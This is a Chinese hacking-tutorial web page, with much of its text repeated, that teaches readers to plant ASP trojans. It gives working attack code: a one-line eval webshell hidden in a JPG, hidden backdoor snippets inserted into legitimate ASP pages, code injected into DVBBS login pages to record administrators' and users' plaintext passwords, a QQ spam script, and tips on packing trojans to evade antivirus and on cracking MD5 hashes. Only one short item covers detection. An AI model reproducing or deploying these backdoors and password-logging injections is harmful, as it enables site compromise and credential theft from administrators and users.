教你成为ASP木马高手
互联网 发布时间:2008-10-08 21:28:18 作者:佚名 
我要评论
我要评论1.名称:如何制作图片ASP木马 (可显示图片)
建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为
了运行成功,还要搜索<%和%>
(福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun)
1.名称:如何制作图片ASP木马 (可显示图片)
建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为
了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#) ) </SCRIPT> 2. 名称:整蛊网吧
先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享, 复制一个木马过去运行即可。 3.名称:感受MD5暴力破解的魅力
rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"
1和7代表密码最小和最大长度
阿汀我再加个方法:http://md5.rednoize.com/ 在线破解
或者到http://www.md5lookup.com/?category=01-3&;searck=on 4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳 的时候最好多选择不知名的加壳软件 5.名称:隐蔽的插入型ASP木马
(1)在我们要做手脚的asp文件里加入如下内容
<%if request("action")="ok" then%>
shell代码插在这里,最好是小马,还要加密一下
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可
(2)另一种方法,在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>
访问的时候在做手脚的asp文件后面加上?filer=XXX
XXX为你本地上传的一个路径如 c:ating123.asp
上传后在做手脚的asp的同文件夹中有ating,asp
(3)前提得到system权限,
进入网站目录下一层
mkdir s…
copy ating.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/ating.asp即可 6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户 用户名为: hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的 7.名称:QQ群脚本攻击
打开qq对话诓,复制消息,然后
下面的内容保存为.vbs 文件,运行即可
Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻击脚本"
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next 8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可 9. 名称:全面找出你站上的ASP木马
(1) 用杀毒软件
(2) 用FTP客户端软件,点"工具"->"比较文件夹"
(3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马
(4) 用工具Beyond Compare 10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画
(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样
老办法:
修改admin_login.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject("Scripting.FileSystemObject")
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了laner.txt
(2)login.asp中Case "login_chk"下:
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
这样laner.asp将获得全部登陆人的登陆时间,用户名和密码
(3)如果你有自己的网站或者另外的webshell(强烈建议使用):
可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>
建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为
了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#) ) </SCRIPT> 2. 名称:整蛊网吧
先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享, 复制一个木马过去运行即可。 3.名称:感受MD5暴力破解的魅力
rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"
1和7代表密码最小和最大长度
阿汀我再加个方法:http://md5.rednoize.com/ 在线破解
或者到http://www.md5lookup.com/?category=01-3&;searck=on 4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳 的时候最好多选择不知名的加壳软件 5.名称:隐蔽的插入型ASP木马
(1)在我们要做手脚的asp文件里加入如下内容
<%if request("action")="ok" then%>
shell代码插在这里,最好是小马,还要加密一下
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可
(2)另一种方法,在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>
访问的时候在做手脚的asp文件后面加上?filer=XXX
XXX为你本地上传的一个路径如 c:ating123.asp
上传后在做手脚的asp的同文件夹中有ating,asp
(3)前提得到system权限,
进入网站目录下一层
mkdir s…
copy ating.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/ating.asp即可 6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户 用户名为: hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的 7.名称:QQ群脚本攻击
打开qq对话诓,复制消息,然后
下面的内容保存为.vbs 文件,运行即可
Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻击脚本"
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next 8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可 9. 名称:全面找出你站上的ASP木马
(1) 用杀毒软件
(2) 用FTP客户端软件,点"工具"->"比较文件夹"
(3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马
(4) 用工具Beyond Compare 10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画
(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样
老办法:
修改admin_login.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject("Scripting.FileSystemObject")
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了laner.txt
(2)login.asp中Case "login_chk"下:
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
这样laner.asp将获得全部登陆人的登陆时间,用户名和密码
(3)如果你有自己的网站或者另外的webshell(强烈建议使用):
可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>
相关文章
- 无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点2013-04-16
- 首先申明: 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口2009-06-09
- 大家是不是拿到了很多webshell.... 但 无法提权....2009-09-30
- 原理:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe ,你把explorer.exe换成sethc.exe 就是自动执行explorer.exe2009-07-19
- FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFol2009-04-20
- 美国一家密码管理应用提供商SplashData 公司近期总结出2012年度最差的25个密码,美国《纽约时报》作家尼克尔·佩尔荣斯近日撰文指出,密码要想不被黑客猜中,有几点非2012-11-13
- 见名思义,帐号具有隐蔽性,不容易被发现(只是在一定程度上)。即一般的菜鸟发现不了2013-01-12
- 1.如何拿到登陆密码,自己想办法。 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database.运行以下语句. ----start cod2008-10-08
- 大家都知道最近海康威视监控设备存在安全隐患的问题倍受关注,很多行业都在热烈的讨论更多地关注了海康威视的安全隐患只是设备存在弱口令问题,下面小编就为大家具体的讲解2016-10-21
最新评论